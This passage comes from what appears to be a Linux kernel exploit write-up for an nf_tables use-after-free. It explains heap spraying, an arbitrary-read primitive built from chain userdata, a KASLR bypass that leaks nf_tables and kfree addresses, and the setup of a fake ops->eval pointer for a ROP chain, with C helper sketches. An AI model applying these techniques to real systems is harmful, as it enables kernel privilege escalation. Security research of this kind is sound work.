        <span class="p">...</span>
        <span class="n">u32</span>                     <span class="n">use</span><span class="p">;</span>
        <span class="n">atomic_t</span>                <span class="n">nelems</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="cm">/* runtime data below here */</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ops</span>        <span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>
        <span class="n">u16</span>                             <span class="n">flags</span><span class="o">:</span><span class="mi">14</span><span class="p">,</span>
                                        <span class="nl">genmask:</span><span class="mi">2</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">klen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">dlen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="n">num_exprs</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_expr</span>         <span class="o">*</span><span class="n">exprs</span><span class="p">[</span><span class="n">NFT_SET_EXPR_MAX</span><span class="p">];</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">catchall_list</span><span class="p">;</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">list_head</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">next</span><span class="p">,</span> <span class="o">*</span><span class="n">prev</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">list_head</code> pointer that we leak points to the start of the linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s, which is the <code class="language-plaintext highlighter-rouge">sets</code> member of the <code class="language-plaintext highlighter-rouge">nft_table</code> that the set belongs to.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_table</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">sets</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Note that in order to create the <code class="language-plaintext highlighter-rouge">nft_rule</code> with multiple <code class="language-plaintext highlighter-rouge">objref_map</code> expressions, we cannot point the expressions to the original set that has the <code class="language-plaintext highlighter-rouge">NFT_SET_ANONYMOUS</code> flag. Instead, we have to create a new <code class="language-plaintext highlighter-rouge">nft_set</code> without that flag to point our expressions to. This is because an anonymous set can only be bound once by an expression, while there is no such restriction if the set isn’t anonymous. After creating our second set, the linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s looks like this.</p>

<svg viewBox="0 0 580 100" xmlns="http://www.w3.org/2000/svg" role="img" aria-labelledby="title desc">
  <title id="title">Linked list of nft_sets</title>
  <desc id="desc">Three boxes connected by arrows: table-&gt;sets (start of linked list), Anonymous nft_set&apos;s list_head, Second nft_set&apos;s list_head</desc>

  <style>
    text { font-family: ui-monospace, 'SFMono-Regular', Menlo, monospace; }
  </style>

  <!-- Box 1 -->
  <rect x="10" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="84" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">table-&gt;sets</text>
  <text x="84" y="60" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">(start of</text>
  <text x="84" y="74" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">linked list)</text>

  <!-- Arrow 1 → 2 -->
  <defs>
    <marker id="arr" markerWidth="8" markerHeight="6" refX="7" refY="3" orient="auto">
      <polygon points="0 0, 8 3, 0 6" fill="#71717a" />
    </marker>
  </defs>
  <line x1="158" y1="50" x2="210" y2="50" stroke="#71717a" stroke-width="1.8" marker-end="url(#arr)" />

  <!-- Box 2 -->
  <rect x="214" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="288" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">Anonymous</text>
  <text x="288" y="60" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">nft_set&apos;s</text>
  <text x="288" y="74" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">list_head</text>

  <!-- Arrow 2 → 3 -->
  <line x1="362" y1="50" x2="414" y2="50" stroke="#71717a" stroke-width="1.8" marker-end="url(#arr)" />

  <!-- Box 3 -->
  <rect x="418" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="492" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">Second nft_set&apos;s</text>
  <text x="492" y="62" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">list_head</text>
</svg>
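
<p>The list in the diagram can be modelled in user space to see what each read returns. This is only a sketch: <code class="language-plaintext highlighter-rouge">mock_table</code>, <code class="language-plaintext highlighter-rouge">mock_set</code> and <code class="language-plaintext highlighter-rouge">read_pointer_at</code> are hypothetical names, and it assumes the list is circular with new sets appended at the tail, as the diagram suggests.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct list_head {
        struct list_head *next, *prev;
};

/* Cut-down stand-ins: only the members the walk needs. */
struct mock_table {
        struct list_head sets;  /* head of the list of sets */
};

struct mock_set {
        struct list_head list;  /* first member, so &set->list == set */
        int id;
};

static void list_init(struct list_head *head)
{
        head->next = head;
        head->prev = head;
}

/* Append entry just before head, i.e. at the tail of the circular list. */
static void list_add_tail(struct list_head *entry, struct list_head *head)
{
        assert(entry != NULL && head != NULL);

        entry->prev = head->prev;
        entry->next = head;
        head->prev->next = entry;
        head->prev = entry;
}

/* One "read" of the leak primitive: fetch the pointer stored at addr. */
static const void *read_pointer_at(const void *addr)
{
        const void *value;

        memcpy(&value, addr, sizeof(value));
        return value;
}
```

<p>In this model, reading at the second set’s address yields the address of the table’s <code class="language-plaintext highlighter-rouge">sets</code> member, and reading at that address yields the anonymous set, which matches the order of the leaks described in this section.</p>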

<p>To actually allocate the <code class="language-plaintext highlighter-rouge">nft_rule</code> with kmalloc-256, we just need to create a rule with 4 <code class="language-plaintext highlighter-rouge">objref_map</code> expressions: the rule attributes take up 24 bytes and each <code class="language-plaintext highlighter-rouge">objref_map</code> expression takes up 48 bytes, for a total of 24 + 4 * 48 = 216 bytes, which is served from kmalloc-256. We then spray the heap with multiple such rules and send a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code>, which will leak the address of the <code class="language-plaintext highlighter-rouge">sets</code> member in the <code class="language-plaintext highlighter-rouge">nft_table</code>.</p>
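
<p>The sizing can be sketched as follows. The helper names are hypothetical, the 24 and 48 byte figures are the ones quoted above, and the size-class model is deliberately simplified to powers of two, so it is an approximation rather than a description of the real allocator.</p>

```c
#include <assert.h>
#include <stddef.h>

#define RULE_HEADER_SIZE  24  /* rule attributes */
#define OBJREF_EXPR_SIZE  48  /* one objref_map expression, per the text */

/* Total rule size for a given number of objref_map expressions. */
static size_t rule_size(size_t num_exprs)
{
        return RULE_HEADER_SIZE + num_exprs * OBJREF_EXPR_SIZE;
}

/*
 * Simplified size-class model: round up to the next power of two,
 * starting at 8 bytes. Real allocators may offer extra classes.
 */
static size_t pow2_size_class(size_t size)
{
        size_t cls = 8;

        assert(size > 0);

        while (cls < size)
                cls *= 2;
        return cls;
}
```

<p>With 4 expressions, <code class="language-plaintext highlighter-rouge">rule_size</code> gives 216 bytes, which rounds up to the 256-byte class. Some kernel configurations also provide non-power-of-two caches, which this model ignores and which would matter for smaller expression counts.</p>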

<p>If we use the address of the <code class="language-plaintext highlighter-rouge">sets</code> member as the leak source pointer, the next read returns the address of the anonymous set’s <code class="language-plaintext highlighter-rouge">list_head</code>, which is also the starting address of that set on the heap (this is the member with the identifier <code class="language-plaintext highlighter-rouge">list</code> in the <code class="language-plaintext highlighter-rouge">nft_set</code>). To craft a primitive that reads from an arbitrary address, we can make use of <code class="language-plaintext highlighter-rouge">nft_chain</code> allocations. When we create an <code class="language-plaintext highlighter-rouge">nft_chain</code>, we can specify the udata (i.e. userdata) that is associated with the chain. During the creation of an <code class="language-plaintext highlighter-rouge">nft_chain</code>, <code class="language-plaintext highlighter-rouge">nf_tables_addchain</code> calls <code class="language-plaintext highlighter-rouge">nla_memdup</code> [1], which calls <code class="language-plaintext highlighter-rouge">kmemdup</code>. This in turn uses <code class="language-plaintext highlighter-rouge">kmalloc_track_caller</code> [2] to allocate a chunk of memory of the size of the userdata and copies the supplied <code class="language-plaintext highlighter-rouge">nft_chain</code> userdata into it [3]. When we specify a chain userdata of size 256, the allocation is performed using kmalloc-256. The chain userdata can then fill the UAF slot, which gives us an arbitrary read primitive: we just need to place the address we want to read from at offset 32 of the chain userdata.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_addchain</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="n">u8</span> <span class="n">family</span><span class="p">,</span> <span class="n">u8</span> <span class="n">genmask</span><span class="p">,</span>
                              <span class="n">u8</span> <span class="n">policy</span><span class="p">,</span> <span class="n">u32</span> <span class="n">flags</span><span class="p">,</span>
                              <span class="k">struct</span> <span class="n">netlink_ext_ack</span> <span class="o">*</span><span class="n">extack</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">])</span> <span class="p">{</span>
                <span class="n">chain</span><span class="o">-&gt;</span><span class="n">udata</span> <span class="o">=</span> <span class="n">nla_memdup</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">],</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">udata</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">err_destroy_chain</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="n">chain</span><span class="o">-&gt;</span><span class="n">udlen</span> <span class="o">=</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">]);</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">nla_memdup</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">kmemdup</span><span class="p">(</span><span class="n">nla_data</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">gfp</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="o">*</span><span class="nf">kmemdup</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp</span><span class="p">)</span>
<span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

        <span class="n">p</span> <span class="o">=</span> <span class="n">kmalloc_track_caller</span><span class="p">(</span><span class="n">len</span><span class="p">,</span> <span class="n">gfp</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">p</span><span class="p">)</span>
                <span class="n">memcpy</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">p</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To reiterate, we want to leak our anonymous set’s address next. All that needs to be done is to write the leaked address of the table’s <code class="language-plaintext highlighter-rouge">sets</code> member at offset 32 of the <code class="language-plaintext highlighter-rouge">nft_chain</code> userdata (which we create with size 256), spray the heap with such chains, and then perform the read with a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code>.</p>
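
<p>Building the userdata buffer for one read could look roughly like this. <code class="language-plaintext highlighter-rouge">build_read_payload</code>, <code class="language-plaintext highlighter-rouge">UDATA_SIZE</code> and the filler byte are hypothetical choices for illustration; the sketch only prepares the buffer and leaves out the netlink message that would carry it.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define UDATA_SIZE       256  /* chain userdata size, lands in kmalloc-256 */
#define KEY_NAME_OFFSET  32   /* offset the stale read dereferences */

/*
 * Fill a 256-byte chain userdata buffer so that the 8 bytes at
 * KEY_NAME_OFFSET hold the address we want the stale read to use.
 */
static void build_read_payload(unsigned char udata[UDATA_SIZE],
                               uint64_t target_addr)
{
        assert(udata != NULL);

        /* Non-zero filler keeps the rest of the buffer recognisable. */
        memset(udata, 0x41, UDATA_SIZE);
        memcpy(udata + KEY_NAME_OFFSET, &target_addr, sizeof(target_addr));
}
```

<p>Each new target address needs a fresh buffer and another round of spraying, since the value is fixed once the userdata has been copied into the slot.</p>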

<h2 id="bypassing-kaslr">Bypassing KASLR</h2>

<p>We begin by obtaining the base address of the loaded <code class="language-plaintext highlighter-rouge">nf_tables</code> <code class="language-plaintext highlighter-rouge">.text</code> section. To do so, we first leak a pointer to an <code class="language-plaintext highlighter-rouge">nf_tables</code> function using the set address that we obtained and then use it to compute the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address. A prime candidate is the <code class="language-plaintext highlighter-rouge">set-&gt;ops</code> pointer (a pointer to <code class="language-plaintext highlighter-rouge">nft_set_ops</code>). This is at offset 192 of the set, so we use the read primitive to read whatever is stored at the set base address + 192. Next, we leak the <code class="language-plaintext highlighter-rouge">ops-&gt;lookup</code> function pointer, which is at offset 0 from the beginning of <code class="language-plaintext highlighter-rouge">nft_set_ops</code>. This leaks the address of the function <code class="language-plaintext highlighter-rouge">nft_hash_lookup</code>, because our set is of type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code> and its <code class="language-plaintext highlighter-rouge">ops</code> is therefore <code class="language-plaintext highlighter-rouge">nft_set_hash_type.ops</code>. Which <code class="language-plaintext highlighter-rouge">ops</code> is assigned can be controlled through the flags set by the user when creating the set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_set_ops</span> <span class="p">{</span>
        <span class="n">bool</span>                    <span class="p">(</span><span class="o">*</span><span class="n">lookup</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="n">u32</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">**</span><span class="n">ext</span><span class="p">);</span>

        <span class="p">...</span>
<span class="p">};</span>

<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_type</span> <span class="n">nft_set_hash_type</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">features</span>       <span class="o">=</span> <span class="n">NFT_SET_MAP</span> <span class="o">|</span> <span class="n">NFT_SET_OBJECT</span><span class="p">,</span>
        <span class="p">.</span><span class="n">ops</span>            <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">privsize</span>       <span class="o">=</span> <span class="n">nft_hash_privsize</span><span class="p">,</span>
                <span class="p">.</span><span class="n">elemsize</span>       <span class="o">=</span> <span class="n">offsetof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_hash_elem</span><span class="p">,</span> <span class="n">ext</span><span class="p">),</span>
                <span class="p">.</span><span class="n">estimate</span>       <span class="o">=</span> <span class="n">nft_hash_estimate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">init</span>           <span class="o">=</span> <span class="n">nft_hash_init</span><span class="p">,</span>
                <span class="p">.</span><span class="n">destroy</span>        <span class="o">=</span> <span class="n">nft_hash_destroy</span><span class="p">,</span>
                <span class="p">.</span><span class="n">insert</span>                 <span class="o">=</span> <span class="n">nft_hash_insert</span><span class="p">,</span>
                <span class="p">.</span><span class="n">activate</span>       <span class="o">=</span> <span class="n">nft_hash_activate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">deactivate</span>     <span class="o">=</span> <span class="n">nft_hash_deactivate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">flush</span>          <span class="o">=</span> <span class="n">nft_hash_flush</span><span class="p">,</span>
                <span class="p">.</span><span class="n">remove</span>                 <span class="o">=</span> <span class="n">nft_hash_remove</span><span class="p">,</span>
                <span class="p">.</span><span class="n">lookup</span>                 <span class="o">=</span> <span class="n">nft_hash_lookup</span><span class="p">,</span>
                <span class="p">.</span><span class="n">walk</span>           <span class="o">=</span> <span class="n">nft_hash_walk</span><span class="p">,</span>
                <span class="p">.</span><span class="n">get</span>            <span class="o">=</span> <span class="n">nft_hash_get</span><span class="p">,</span>
        <span class="p">},</span>
<span class="p">};</span>
</code></pre></div></div>
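<p>The two reads above can be sketched as follows. This is a user-space illustration only: <code class="language-plaintext highlighter-rouge">struct toy_mem</code> and <code class="language-plaintext highlighter-rouge">read64</code> are hypothetical stand-ins for the exploit’s read primitive, and <code class="language-plaintext highlighter-rouge">lookup_off</code> (the offset of <code class="language-plaintext highlighter-rouge">nft_hash_lookup</code> inside the module) is an assumed, build-specific input. Only the offsets 192 and 0 come from the text.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SET_OPS_OFFSET    192  /* offset of set->ops within nft_set (from the text) */
#define OPS_LOOKUP_OFFSET   0  /* offset of ops->lookup within nft_set_ops */

/* Toy stand-in for kernel memory, so the arithmetic can be run in user space. */
struct toy_mem {
    uint64_t       base;   /* pretend kernel address of bytes[0] */
    const uint8_t *bytes;
    size_t         len;    /* must be at least 8 */
};

/* Hypothetical stand-in for the exploit's 8-byte read primitive. */
static uint64_t read64(const struct toy_mem *m, uint64_t addr)
{
    uint64_t v;

    assert(addr >= m->base && addr - m->base <= m->len - sizeof(v));
    memcpy(&v, m->bytes + (addr - m->base), sizeof(v));
    return v;
}

/*
 * lookup_off: offset of nft_hash_lookup from the start of the module's
 * .text section. It is specific to the target kernel build.
 */
static uint64_t leak_nf_tables_base(const struct toy_mem *m, uint64_t set_addr,
                                    uint64_t lookup_off)
{
    uint64_t ops    = read64(m, set_addr + SET_OPS_OFFSET);  /* set->ops */
    uint64_t lookup = read64(m, ops + OPS_LOOKUP_OFFSET);    /* ops->lookup */

    return lookup - lookup_off;
}
```

<p>In the real exploit each <code class="language-plaintext highlighter-rouge">read64</code> call corresponds to one round of heap spray plus an <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code> request rather than a direct memory access.</p>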

<p>Subtracting the known offset of <code class="language-plaintext highlighter-rouge">nft_hash_lookup</code> from its leaked address gives the base address of the <code class="language-plaintext highlighter-rouge">.text</code> section of <code class="language-plaintext highlighter-rouge">nf_tables</code>. With the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address, we can go on to leak the address of a function in the <code class="language-plaintext highlighter-rouge">.text</code> section of <code class="language-plaintext highlighter-rouge">vmlinux</code> itself. Since there are a plethora of <code class="language-plaintext highlighter-rouge">kfree</code> calls within <code class="language-plaintext highlighter-rouge">nf_tables_api</code>, we can use the relative offset encoded in one of those calls to get the address of the actual <code class="language-plaintext highlighter-rouge">kfree</code> function. A candidate is the function <code class="language-plaintext highlighter-rouge">nft_set_destroy</code>, which contains a call to <code class="language-plaintext highlighter-rouge">kfree</code>. We trigger the read primitive at the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address plus the offset of the <code class="language-plaintext highlighter-rouge">kfree</code> call site in <code class="language-plaintext highlighter-rouge">nft_set_destroy</code>. Combining the relative offset read from the call instruction with the address of the call site gives the address of the <code class="language-plaintext highlighter-rouge">kfree</code> function definition, and subtracting the known offset of <code class="language-plaintext highlighter-rouge">kfree</code> within the kernel image then gives the base address of the kernel <code class="language-plaintext highlighter-rouge">.text</code> section.</p>
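<p>To make the call-site arithmetic concrete, here is a small sketch that assumes an x86-64 target where the call to <code class="language-plaintext highlighter-rouge">kfree</code> is a plain direct <code class="language-plaintext highlighter-rouge">call rel32</code> (opcode <code class="language-plaintext highlighter-rouge">0xE8</code> followed by a signed 32-bit displacement relative to the next instruction). The helper name <code class="language-plaintext highlighter-rouge">resolve_call_target</code> is hypothetical, and a kernel that rewrites its call sites would need different handling.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CALL_REL32_OPCODE 0xE8  /* x86-64 direct near call */
#define CALL_REL32_LEN    5     /* 1 opcode byte + 4 displacement bytes */

/*
 * insn_addr: kernel address of the call instruction.
 * insn:      the 5 bytes leaked from that address.
 * Returns 0 and stores the call target, or -1 if the bytes are not a
 * direct call (for example because the call-site offset was wrong).
 */
static int resolve_call_target(uint64_t insn_addr, const uint8_t *insn,
                               uint64_t *target)
{
    int32_t rel;

    assert(insn != NULL && target != NULL);
    if (insn[0] != CALL_REL32_OPCODE)
        return -1;

    /* The displacement is little-endian; the host is assumed to be too. */
    memcpy(&rel, insn + 1, sizeof(rel));

    /* target = address of the next instruction + sign-extended rel32 */
    *target = insn_addr + CALL_REL32_LEN + (uint64_t)(int64_t)rel;
    return 0;
}
```

<p>The kernel <code class="language-plaintext highlighter-rouge">.text</code> base then follows as the resolved target minus the offset of <code class="language-plaintext highlighter-rouge">kfree</code> in the target’s kernel image, which again has to be looked up for the specific build.</p>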

<h2 id="hijacking-execution-flow">Hijacking execution flow</h2>

<h3 id="leaking-the-address-of-an-nft_object">Leaking the address of an <code class="language-plaintext highlighter-rouge">nft_object</code></h3>

<p>One way of triggering a ROP chain to hijack execution flow is to make use of the <code class="language-plaintext highlighter-rouge">eval</code> function pointer of the <code class="language-plaintext highlighter-rouge">ops</code> member of an <code class="language-plaintext highlighter-rouge">nft_object</code>. This function pointer can be easily triggered by just registering an <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type as part of a rule and then sending a packet which will cause this expression to be processed. To execute our ROP chain, we leverage the UAF to cause a type confusion where the supposed <code class="language-plaintext highlighter-rouge">eval</code> function pointer is actually pointing to some region in memory containing our payload. An <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type holds a pointer to an <code class="language-plaintext highlighter-rouge">nft_object</code> as its private data [1] and upon evaluation, it simply delegates the evaluation to its <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">eval</code> function [2]. Since our UAF involves a freed <code class="language-plaintext highlighter-rouge">nft_object</code> that we can freely replace, this makes an <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type a perfect candidate to abuse for hijacking execution flow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_objref_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
			   <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
			   <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span> <span class="o">=</span> <span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
	<span class="n">u8</span> <span class="n">genmask</span> <span class="o">=</span> <span class="n">nft_genmask_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">);</span>
	<span class="n">u32</span> <span class="n">objtype</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_NAME</span><span class="p">]</span> <span class="o">||</span>
	    <span class="o">!</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_TYPE</span><span class="p">])</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">objtype</span> <span class="o">=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">nla_get_be32</span><span class="p">(</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_TYPE</span><span class="p">]));</span>
	<span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
			     <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_NAME</span><span class="p">],</span> <span class="n">objtype</span><span class="p">,</span>
			     <span class="n">genmask</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">obj</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_objref_eval</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
			    <span class="k">struct</span> <span class="n">nft_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span> <span class="o">=</span> <span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>

	<span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">eval</span><span class="p">(</span><span class="n">obj</span><span class="p">,</span> <span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">ops</code> member is at offset 128 [1] from the start of the <code class="language-plaintext highlighter-rouge">nft_object</code>, and the <code class="language-plaintext highlighter-rouge">eval</code> function pointer is at offset 0 [2] of the structure that <code class="language-plaintext highlighter-rouge">ops</code> points to. We simply need to make sure that the address of the start of our ROP chain is stored at offset 128 of whatever we replace the freed slot with. Conveniently, this leaves the first 128 bytes of the slot free for us to store the payload.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_object</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">rhlist_head</span>      <span class="n">rhlhead</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_object_hash_key</span>      <span class="n">key</span><span class="p">;</span>
        <span class="n">u32</span>                     <span class="n">genmask</span><span class="o">:</span><span class="mi">2</span><span class="p">,</span>
                                <span class="nl">use:</span><span class="mi">30</span><span class="p">;</span>
        <span class="n">u64</span>                     <span class="n">handle</span><span class="p">;</span>
        <span class="n">u16</span>                     <span class="n">udlen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="o">*</span><span class="n">udata</span><span class="p">;</span>
        <span class="cm">/* runtime data below here */</span>
